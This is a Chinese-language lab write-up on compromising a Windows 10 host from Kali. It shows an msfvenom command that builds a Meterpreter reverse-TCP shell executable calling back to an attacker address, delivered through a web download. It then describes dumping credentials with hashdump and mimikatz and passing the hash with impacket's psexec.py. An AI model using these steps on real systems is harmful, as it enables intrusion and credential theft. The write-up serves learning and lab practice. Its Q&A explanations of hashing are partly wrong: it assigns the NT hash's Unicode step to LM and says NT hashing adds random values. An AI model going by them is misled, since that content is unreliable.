目录

实验准备

用msf拿到shell

抓取hash和明文密码

相关问题

问题1.通过hashdump抓取所有用户的密文为什么分成两个模块，这两个模块分别代表什么 ？

问题2.为什么第一个模块 永远是一样的aad3？

问题3.这两个模块的加密算法有什么不同，如何加密的？

问题4.windows登录的明文密码，存储过程是怎么样的，密文存在哪个文件下，该文件是否可以打开，并且查看到密文？

---

实验准备

        一台kali

        一台windows10，防火墙和实时保护关掉。

用msf拿到shell

1.先生成一个反弹木马：

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.247.135 LPORT=12345 -f exe -o shell.exe

2.然后挂到网页上去win10上用浏览器下载下来：

3.msf开启监听，然后点击木马上线：

抓取hash和明文密码

1.提权后直接hashdump获取hash值：

相关问题

问题1.通过hashdump抓取所有用户的密文为什么分成两个模块，这两个模块分别代表什么 ？

        因为这两部分是不同的内容，第一部分是LM哈希，第二部分是NT哈希。

问题2.为什么第一个模块 永远是一样的aad3？

        因为LM哈希不安全，都是aad3这样的内容说明LM Hash为空值或被禁用了。

问题3.这两个模块的加密算法有什么不同，如何加密的？

        第一部分是基于DES算法加密的，第二部分是基于MD4算法加密的；

        第一部分加密过程是用户密码首先被转换为Unicode格式，然后使用Unicode Little-Endian编码进行哈希，第二部分是将用户密码和一些随机数来结合计算出的哈希值，更复杂更安全。

2.然后现在尝试抓取明文密码：

        用工具mimikatz，先在会话中导入kiwi：

        然后尝试抓取明文密码：

发现密码这一列都是null，先看下面这个问题：

问题4.windows登录的明文密码，存储过程是怎么样的，密文存在哪个文件下，该文件是否可以打开，并且查看到密文？

       登录的时候会启动一个winlogon.exe进程，把明文账号密码发给lsass.exe这个进程，然后这个进程会干两件事，1是把明文账号密码在内存中存储一份，2是把账号密码加密后存在SAM这个文件里：

但是这个文件打不开看不了。可以利用其他工具来看。

现在回到第二部，因为mimikatz这个工具是利用了lsass.exe会把一份明文账号密码存到内存中，所以才能抓到，但是由于系统补丁才抓不到了。不过继续横向不需要明文密码，因为系统验证都是通过比对hash值的，而哈希值又是不可逆的，所以知道明文密码也没什么作用，反而比hash麻烦了一步。

3.利用hash登录

        这里直接利用kali自带的脚本，/usr/share/doc/python3-impacket/examples下的psexec.py: